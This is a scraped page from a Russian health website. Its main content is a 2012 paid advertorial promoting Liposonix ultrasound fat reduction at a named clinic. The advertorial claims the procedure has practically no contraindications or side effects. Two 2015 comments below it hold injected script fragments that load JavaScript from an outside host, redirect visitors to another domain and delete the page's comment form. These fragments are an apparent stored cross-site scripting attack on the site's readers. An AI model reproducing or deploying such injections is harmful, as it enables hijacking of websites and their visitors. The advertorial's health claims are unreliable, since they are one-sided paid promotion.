Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Аппаратная косметология: ...  >>  Аппаратная косметология: прицельно убираем лишний объем
 
Обратная связь
 

Аппаратная косметология: прицельно убираем лишний объем

Размер шрифта
12 ноября 2012 00:02
  • google_analytics: false
  • Нравится

Совсем недавно, если женщина была недовольна объемом своей талии, наличием «валика» на животе или «галифе» на бедрах, по-настоящему помочь ей могла лишь пластическая хирургия.

Liposonix

Происходит это из-за того, что даже самые жесткие диеты не вызывают направленного снижения объемов в заданной зоне, а занятия на тренажерах не способны избавить от «галифе».

Возможность направленного изменения объемов неинвазивным путем открыли американские ученые. Они разработали и внедрили уникальный аппарат Liposonix, способный растопить лишние объемы без вреда для здоровья при помощи фокусированного ультразвука

Технология

Мощный фокусированный ультразвук с частотой 2 МГц способен беспрепятственно проникать сквозь кожные покровы на глубину 1,3 см. Достигнув клеток подкожно-жировой клетчатки, ультразвуковые колебания быстро нагревают жировые клетки до температуры 56 градусов. Под воздействием столь высоких температур жировые клетки буквально тают, после чего метаболизируются и выводятся из организма. Кожные покровы и другие ткани при этом не подвергаются воздействию.

Возможности

Аппарат Liposonix дарит уникальную возможность избавиться от нежелательных объемов на животе, на боках, на бедрах даже тем женщинам, у которых нет лишнего веса, но есть некоторые нюансы телосложения.

Всего одна процедура на аппарате Liposonix длительностью один час способна сделать жировую складку меньше на 5 см. А вместе с жировыми складками уходит и объем – именно в тех местах, где это требуется.

Предсказуемый, прогнозируемый результат – одно из главных достоинств процедуры, аналогов которой в настоящее время не существует.

Ограничения

Процедура на аппарате Liposonix практические не имеет противопоказаний, не вызывает негативных побочных эффектов, не предусматривает подготовительного и реабилитационного периода, и может применяться с 18 лет.

Единственное ограничение при проведении процедуры состоит в том, что жировая складка, если зажать ее между пальцами, должна иметь толщину не менее 2,5 см. Это необходимо, чтобы воздействие ультразвука распространялось только на клетки жировой ткани.

Зоны возможного воздействия в каждом случае врач-косметолог определяет индивидуально.

Результаты

Максимальный результат после проведения процедуры в 90% случаев отмечается через 8-12 недель. Этого времени достаточно, чтобы разрушенные жировые клетки были полностью выведены из организма.

Кожа в зонах обработки остается подтянутой и упругой. Во-первых, этому способствует технология, активизирующая в толще кожи выработку собственного коллагена. Во-вторых, плавное, в течение длительного времени, снижение объемов позволяет коже приспособиться к новой форме и избежать обвисания.

Для сохранения результата после проведения процедуры рекомендуется придерживаться привычной диеты.

Пройти процедуру Liposonix можно в клинике красоты и здоровья «WestMed».

westmed

Статья опубликована на правах рекламы
  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:24

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как уменьшить жир на лице?   Гнев + голод = гневолод   С каждым годом набираете все больше и больше веса? Во всем виноват ваш язык!   10 правил похудения, которые действительно работают  
21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть! 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 
31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом! 15 августа 2012Обнаружены механизмы, контролирующие ожирение и атеросклероз!
 

Слайдшоу

1
5 ошибок, которые не дают вам быть стройной и красивой!
Как пережить каникулы и не потолстеть?
Как не сорваться на диете и похудеть? Часть 2

Тесты

1
Какое мороженное съесть, чтобы похудеть
Жиры, которые мы едим
Правильно ли вы худеете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.